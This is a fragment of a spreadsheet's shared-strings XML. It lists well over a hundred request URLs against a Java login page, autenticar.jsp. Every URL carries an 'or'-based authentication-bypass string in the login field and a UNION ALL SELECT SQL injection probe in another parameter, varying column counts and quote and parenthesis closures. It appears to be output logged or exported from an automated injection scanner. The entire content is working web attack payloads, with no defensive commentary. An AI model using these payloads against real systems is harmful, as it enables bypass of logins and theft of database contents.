    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4671,4671,4671,4671--and((("lhkd"="lhkd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect2408,2408,2408,2408,2408--and((("zzhf"="zzhf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect5953,5953,5953,5953,5953,5953--and((("fyjv"="fyjv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect7713,7713,7713,7713,7713,7713,7713--and((("dxph"="dxph</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect8754,8754,8754,8754,8754,8754,8754,8754--and((("ancq"="ancq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6845,6845,6845,6845,6845,6845,6845,6845,6845--and((("chqq"="chqq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect5102,5102,5102,5102,5102,5102,5102,5102,5102,5102--and((("ehsq"="ehsq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9608--and"qdhf"="qdhf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2435,2435--and"ojbm"="ojbm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect760,760,760--and"wymn"="wymn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9161,9161,9161,9161--and"rgqw"="rgqw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7972,7972,7972,7972,7972--and"piha"="piha</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5242,5242,5242,5242,5242,5242--and"noop"="noop</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8623,8623,8623,8623,8623,8623,8623--and"qlte"="qlte</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect277,277,277,277,277,277,277,277--and"ibur"="ibur</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect6516,6516,6516,6516,6516,6516,6516,6516,6516--and"uxpl"="uxpl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect6407,6407,6407,6407,6407,6407,6407,6407,6407,6407--and"kash"="kash</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect8776--and("ebao"like"ebao</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect9535,9535--and("nbjy"like"nbjy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect7483,7483,7483--and("xytp"like"xytp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6860,6860,6860,6860--and("lejw"like"lejw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect1411,1411,1411,1411,1411--and("mixm"like"mixm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4413,4413,4413,4413,4413,4413--and("hsyz"like"hsyz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect2316,2316,2316,2316,2316,2316,2316--and("bldx"like"bldx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect1728,1728,1728,1728,1728,1728,1728,1728--and("kzen"like"kzen</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect3686,3686,3686,3686,3686,3686,3686,3686,3686--and("ewdv"like"ewdv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6872,6872,6872,6872,6872,6872,6872,6872,6872,6872--and("bjre"like"bjre</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect1663--and(("bjkm"like"bjkm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect5958,5958--and(("usrl"like"usrl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect1945,1945,1945--and(("fecc"like"fecc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect6425,6425,6425,6425--and(("genb"like"genb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect1314,1314,1314,1314,1314--and(("ylsd"like"ylsd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect7714,7714,7714,7714,7714,7714--and(("etcp"like"etcp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect6501,6501,6501,6501,6501,6501,6501--and(("zvpb"like"zvpb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect296,296,296,296,296,296,296,296--and(("hhmf"like"hhmf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect7214,7214,7214,7214,7214,7214,7214,7214,7214--and(("twtq"like"twtq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect9894,9894,9894,9894,9894,9894,9894,9894,9894,9894--and(("jnsv"like"jnsv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6680--and((("smex"like"smex</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect8807,8807--and((("svna"like"svna</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4015,4015,4015--and((("uuek"like"uuek</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect1222,1222,1222,1222--and((("xisc"like"xisc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect1619,1619,1619,1619,1619--and((("szyb"like"szyb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6099,6099,6099,6099,6099,6099--and((("oufq"like"oufq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect2118,2118,2118,2118,2118,2118,2118--and((("demb"like"demb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect368,368,368,368,368,368,368,368--and((("ruuo"like"ruuo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect8957,8957,8957,8957,8957,8957,8957,8957,8957--and((("bssy"like"bssy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect2378,2378,2378,2378,2378,2378,2378,2378,2378,2378--and((("efvc"like"efvc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2225--and"jqnj"like"jqnj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7104,7104--and"srcw"like"srcw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4744,4744,4744--and"xicw"like"xicw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3607,3607,3607,3607--and"kerc"like"kerc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5927,5927,5927,5927,5927--and"boll"like"boll</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect6408,6408,6408,6408,6408,6408--and"zxca"like"zxca</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3567,3567,3567,3567,3567,3567,3567--and"vkuq"like"vkuq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2650,2650,2650,2650,2650,2650,2650,2650--and"dauw"like"dauw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8176,8176,8176,8176,8176,8176,8176,8176,8176--and"xxqx"like"xxqx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9545,9545,9545,9545,9545,9545,9545,9545,9545,9545--and"ohrf"like"ohrf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect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--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect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--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect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--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect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--and(9212=9212</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and(1141=1141</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and(3282=3282</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and(9396=9396</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(4320=4320</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(1943=1943</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(1406=1406</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(345=345</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(1034=1034</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(6319=6319</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null--and((7020=7020</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and((4929=4929</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and((703=703</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and((6035=6035</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((8527=8527</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((7496=7496</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((8573=8573</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((6652=6652</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((9655=9655</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((258=258</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null--and(((5971=5971</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and(((6226=6226</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and(((1965=1965</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((151=151</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((5627=5627</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((515=515</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((4649=4649</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((6097=6097</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((825=825</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((7289=7289</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull,null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull,null,null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect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--and('khhm'='khhm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and('fnza'='fnza</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and('fzqr'='fzqr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and('csfd'='csfd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('asvf'='asvf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('dbtt'='dbtt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('glxy'='glxy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('txzs'='txzs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('djdu'='djdu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('yzez'='yzez</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null--and(('ovjb'='ovjb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and(('nbjs'='nbjs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and(('pyfa'='pyfa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('dxkq'='dxkq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('zrzf'='zrzf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('xmyw'='xmyw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('oybg'='oybg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('jixl'='jixl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('zbqp'='zbqp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('mhyo'='mhyo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null--and((('pdwt'='pdwt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and((('esgn'='esgn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and((('wqmt'='wqmt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('zcyq'='zcyq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('vbzc'='vbzc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('voxp'='voxp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('vabd'='vabd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('ujut'='ujut</t>
  </si>
  <si>
